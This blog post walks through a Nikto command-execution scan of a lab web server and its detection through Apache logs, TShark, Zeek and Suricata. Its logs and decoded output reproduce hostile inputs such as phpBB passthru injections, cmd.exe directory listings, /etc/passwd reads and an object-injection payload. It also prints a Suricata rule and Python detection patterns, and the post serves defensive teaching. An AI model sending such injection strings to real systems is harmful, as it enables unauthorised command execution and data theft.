This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection.
From the hacking perspective, Nikto is the tool used. From the detection perspective, the tools and processes used for the network forensics are log analysis, TShark, Zeek and Suricata.
The Hack - Beginning Nikto - Command Execution / Remote Shell
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -nossl -no404 -Tuning 8
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.0.0.106
+ Target Hostname: 10.0.0.106
+ Target Port: 80
+ Start Time: 2023-06-07 15:54:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
+ /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Retrieved x-powered-by header: PHP/8.0.28.
+ OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects (302) to http://10.0.0.106/dashboard/ , phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.
+ ...
+ /index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects (302) to http://10.0.0.106/dashboard/ , phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.
+ /?-s - Redirects (302) to http://10.0.0.106/dashboard/ , PHP allows retrieval of the source code via the -s parameter, and may allow command execution.
+ 1074 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-06-07 15:54:22 (GMT-4) (2 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Looking at the above, one may immediately conclude that this site is vulnerable. However, we know from our previous posts that the parameters referenced by "index.php", such as name, do not exist on this page.
See here for more on attacking Command Injection:
Learning by practicing: Beginning Web Application Testing: OS Command Injection - DVWA (securitynik.com)
Detect - Log Analysis
Jumping straight to the decoding of the URLs. Take a look at the first 7 lines with parameters that need decoding.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ cat access.log |grep --perl-regexp '\?.*?\s+HTTP' --only-matching | grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | sort --unique | head --lines=7
%0acat%0a/etc/passwd%0a
aaaaaaaa
action=load&whois=%3Bid
action=modify_user
APP=qmh-news&TEMPLATE=;ls%20/etc|
arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
Decoding the above, and the remaining entries, via URL decoding (urlencode -d).
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ cat access.log |grep --perl-regexp '\?.*?\s+HTTP' --only-matching | grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | sort --unique | awk --field-separator=' ' '{ system("urlencode -d "$1) }'
... aaaaaaaa action=load action=modify_user alert-debug.log arguments=O:12:"vB_dB_Result":2:{s:5:" /bin/cat /etc/passwd cat cat /etc/hosts cat /etc/passwd cat /etc/passwd /c dir /c dir c:\ /c dir c:\" /c dir /OG cli=aa aa'cat /etc/hosts cmd=cat /etc/passwd cmd=dir c:\\ command=savesetup conn.log /c ver data=Download dns.log email=x /etc/passwd _MAILTO=xx message=test\ name=forums name=Forums name=Network_Tools name=PNphpBB2 Nikto=forums Nikto=Forums pass= process QALIAS=x Qname=root QNikto=root query=AAA realname=aaa realNikto=aaa reporter.log -s sd=ls /etc server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF type=Library -v WSDL xsl=/vcs/vcs_home.xsl&cat "/etc/passwd"&
We already know most of those parameters are non-existent. Additionally, the host running this web server is Windows based, not Linux.
See here for more on detecting command injection via logs.
Learning by practicing: Beginning Web Application Testing: Detecting OS Command Injection - DVWA (securitynik.com)
Detect - Packet Analysis
Setup for packet analysis: capture packets on ports 80 and 443.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ tshark -n -w tuning_1.pcap -f 'tcp port(80 or 443)' --interface eth0
Decoding the URLs from the packet data.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ tshark -n -r tuning_8.pcap -Y 'http.request.method == "GET"' -T fields -e http.request.uri | grep --perl-regexp '\?.*' --only-matching | \
grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | \
awk --field-separator='HTTP' '{ print $1 }' | sort --unique | \
awk --field-separator=' ' '{ system("urlencode -d "$1) }'
cat /etc/passwd aaaaaaaa action=load action=modify_user cat /etc/passwd cat /etc/hosts /c dir /c dir c:" /c dir c:\ /c dir /OG cli=aa aa'cat /etc/hosts cmd=cat /etc/passwd cmd=dir c:\ command=savesetup /c ver data=Download ... name=forums name=Forums name=forums name=Network_Tools name=Forums name=PNphpBB2 name=PNphpBB2 Nikto=forums Nikto=Forums Nikto=forums Nikto=Forums pass= QALIAS=x /bin/cat /etc/passwd Qname=root cat /etc/passwd QNikto=root cat /etc/passwd query=AAA realNikto=aaa -s sd=ls /etc realname=aaa server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF t=2 t=2 type=Library type=Library WSDL xsl=/vcs/vcs_home.xsl&cat "/etc/passwd"&
Not much more to do here. Transitioning to Zeek.
Detect - Zeek Analysis
Setup Zeek
┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]
└─$ sudo zeek --iface any --no-checksums
Analyzing the http.log file.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ cat http.log | grep --perl-regexp "\s+\/.*?\s+" --only-matching | \
grep --perl-regexp '\?.*' --only-matching | grep --invert-match "phpinfo" | \
cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | \
sort --unique | awk --field-separator=' ' '{ system("urlencode -d "$1) }'
aaaaaaaa uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),121(bluetooth),133(scanner),141(vboxsf),142(kaboxer),147(docker) action=load action=modify_user ... sd=ls server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF sh: 1: Syntax error: "(" unexpected t=2 type=Library type=Library user=cpanel user_id=1 -v WSDL x0acatx0a/etc/passwdx0a
The information above is the same as that seen in the log and packet analysis sections; the difference is that it was extracted from Zeek's http.log file.
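Because the awk pipelines above hand each log value to a shell via system(), a value that decodes to shell syntax runs on the analyst's box (the uid=1000(kali) and sh: 1: Syntax error lines in the Zeek output are local command output, not log data). The Python below is an added example, not the post's own code, covering the access.log, pcap and http.log decoding steps in one place: it treats decoded values strictly as data, also unwraps double encoding such as %2527, and tags the command-injection indicators seen in this run. The log lines, client IP and indicator list are constructed assumptions.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed Apache access.log lines modelled on request URIs from the scan
# above (client IP and timestamps are made up).
ACCESS_LOG = r"""
10.0.0.7 - - [07/Jun/2023:15:54:21 -0400] "GET /index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.7 - - [07/Jun/2023:15:54:21 -0400] "GET /cgi-bin/cmd.exe?/c+dir HTTP/1.1" 404 - "-" "Mozilla/5.0"
10.0.0.7 - - [07/Jun/2023:15:54:21 -0400] "GET /cal.cgi?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 HTTP/1.1" 404 - "-" "Mozilla/5.0"
10.0.0.7 - - [07/Jun/2023:15:54:21 -0400] "GET /dashboard/?page=1 HTTP/1.1" 200 - "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
INDICATORS = {  # patterns drawn from the decoded values seen in this run
    "shell-command": re.compile(r"(?:^|[\s=;|&`])\s*(?:cat|ls|id|dir|ver|whoami)\b", re.I),
    "sensitive-file": re.compile(r"/etc/(?:passwd|hosts|shadow)|[a-z]:\\", re.I),
    "php-exec-func": re.compile(r"\b(?:passthru|system|exec|shell_exec|assert)\s*\(", re.I),
    "cmd.exe": re.compile(r"cmd\.exe", re.I),
}

def _decode_until_stable(text: str, decode, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded values (%2527 -> %27 -> ')
    are unwrapped. The result is only ever treated as data; nothing is handed
    to a shell, unlike awk's system() in the pipelines above."""
    for _ in range(max_rounds):
        decoded = decode(text)
        if decoded == text:
            break
        text = decoded
    return text

def decode_uri(uri: str) -> str:
    path, sep, query = uri.partition("?")
    # '+' means space only in the query part, which is what urlencode -d showed.
    return _decode_until_stable(path, unquote) + sep + _decode_until_stable(query, unquote_plus)

def classify(decoded_uri: str) -> list:
    return sorted(name for name, rx in INDICATORS.items() if rx.search(decoded_uri))

def suspicious_requests(log_text: str) -> list:
    """Return (path, decoded URI, indicator tags) for each request tripping an indicator."""
    hits = []
    for m in REQUEST_RE.finditer(log_text):
        decoded = decode_uri(m["uri"])
        tags = classify(decoded)
        if tags:
            hits.append((m["uri"].partition("?")[0], decoded, tags))
    return hits
```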
Detect - Suricata (IDS) Analysis
Setup Suricata to operate in IDS mode
┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all
Wrapping this up with Suricata.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5
45 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt
23 1:2009361:8] ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt
22 1:2009362:7] ET WEB_SERVER /system32/ in Uri - Possible Protected Directory Access Attempt
14 1:2021390:3] ET WEB_SPECIFIC_APPS WEB-PHP RCE PHPBB 2004-1315
12 1:2100982:12] GPL EXPLOIT unicode directory traversal attempt
The one we will extract here is the 23 hits on "1:2009361:8] ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt".
What is the rule looking for?
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ grep "2009361" /var/lib/suricata/rules/suricata.rules | fmt
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt"; flow:to_server,established; http.uri; content:"/cmd.exe"; nocase; reference:url,doc.emergingthreats.net/2009361; classtype:attempted-recon; sid:2009361; rev:8; metadata:created_at 2010_07_30, updated_at 2020_09_14;)
The rule checks that the three-way handshake has completed (flow:established) and that the traffic is going to the server (flow:to_server). The server in this case is the device that sent the SYN-ACK while the session was being established. It also looks for the content "/cmd.exe" in the URI, case-insensitively (nocase). Let's find the packet where "/cmd.exe" is in the URI.
ALERT CNT: 1
ALERT MSG [00]: ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt
ALERT GID [00]: 1
ALERT SID [00]: 2009361
ALERT REV [00]: 8
ALERT CLASS [00]: Attempted Information Leak
ALERT PRIO [00]: 2
ALERT FOUND IN [00]: STATE
ALERT IN TX [00]: 49
PAYLOAD LEN: 211
PAYLOAD:
0000  47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 63 6D 64  GET /cgi -bin/cmd
0010  2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50  .exe?/c+ dir HTTP
0020  2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 30 2E 30  /1.1..Ho st: 10.0
0030  2E 30 2E 31 30 36 0D 0A 43 6F 6E 6E 65 63 74 69  .0.106.. Connecti
0040  6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A  on: Keep -Alive..
0050  55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69  User-Age nt: Mozi
0060  6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73  lla/5.0  (Windows
0070  20 4E 54 20 31 30 2E 30 3B 20 57 69 6E 36 34 3B   NT 10.0 ; Win64;
0080  20 78 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69   x64) Ap pleWebKi
0090  74 2F 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C  t/537.36  (KHTML,
00A0  20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72   like Ge cko) Chr
00B0  6F 6D 65 2F 37 34 2E 30 2E 33 37 32 39 2E 31 36  ome/74.0 .3729.16
00C0  39 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 0D  9 Safari /537.36.
00D0  0A 0D 0A                                         ...
Nothing meaningful left here to review.
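To see exactly what sid 2009361 does and does not catch, here is an added example (not from the post or the Emerging Threats rule set) that re-implements the rule's http.uri content match in Python against the request rebuilt from the payload dump above, plus constructed requests for other URIs from this scan that carry injection attempts but no /cmd.exe and so never trigger it. The percent-decoded comparison approximates Suricata's normalised URI buffer and the flow keywords are not modelled; both are assumptions.

```python
from typing import Optional
from urllib.parse import unquote

# The 211-byte request from the Suricata alert payload above, rebuilt from
# its hex/ASCII columns.
CMD_EXE_REQUEST = (
    b"GET /cgi-bin/cmd.exe?/c+dir HTTP/1.1\r\n"
    b"Host: 10.0.0.106\r\n"
    b"Connection: Keep-Alive\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\r\n"
    b"\r\n"
)

# Constructed payloads for other traffic in this scan: two injection-style
# URIs without "/cmd.exe", and a server reply (wrong direction for to_server).
OTHER_PAYLOADS = [
    b"GET /index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c HTTP/1.1\r\nHost: 10.0.0.106\r\n\r\n",
    b"GET /some.php?cmd=cat%20/etc/passwd HTTP/1.1\r\nHost: 10.0.0.106\r\n\r\n",
    b"HTTP/1.1 302 Found\r\nLocation: http://10.0.0.106/dashboard/\r\n\r\n",
]

def request_target(payload: bytes) -> Optional[str]:
    """Return the request-target from an HTTP/1.x request line, or None when
    the payload is not a client request (a response fails the to_server test)."""
    parts = payload.split(b"\r\n", 1)[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None
    return parts[1].decode("latin-1")

def matches_sid_2009361(payload: bytes) -> bool:
    """Payload-level equivalent of the rule body
        http.uri; content:"/cmd.exe"; nocase;
    i.e. a case-insensitive substring match on the request URI. flow:established
    needs TCP state and is not modelled; also matching the percent-decoded form
    approximates Suricata's normalised URI buffer (an assumption here)."""
    target = request_target(payload)
    if target is None:
        return False
    return "/cmd.exe" in target.lower() or "/cmd.exe" in unquote(target).lower()
```

Only the cmd.exe requests satisfy the content match, which is why this signature fired 23 times while the other injection-style URIs in the scan were left to different rules.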
Hope you enjoyed the posts in this series: